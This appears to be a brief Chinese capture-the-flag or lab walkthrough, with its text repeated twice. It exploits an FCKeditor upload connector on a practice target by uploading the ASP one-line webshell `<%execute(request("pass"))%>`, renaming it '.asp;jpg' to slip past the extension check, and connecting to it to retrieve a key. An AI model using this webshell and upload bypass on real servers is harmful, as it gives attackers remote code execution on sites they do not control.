1.进入页面
2.进入URL:
http://219.153.49.228:42852/fckeditor/editor/filemanager/connectors/test.html
3.上传一句话木马,burp抓包
修改后缀名为.asp;jpg
一句话木马为<%execute(request("pass"))%>
4.连接webshell,连接地址:http://219.153.49.228:42852/userfiles/file/1.asp;jpg
找到key
1.进入页面
2.进入URL:
http://219.153.49.228:42852/fckeditor/editor/filemanager/connectors/test.html
3.上传一句话木马,burp抓包
修改后缀名为.asp;jpg
一句话木马为<%execute(request("pass"))%>
4.连接webshell,连接地址:http://219.153.49.228:42852/userfiles/file/1.asp;jpg
找到key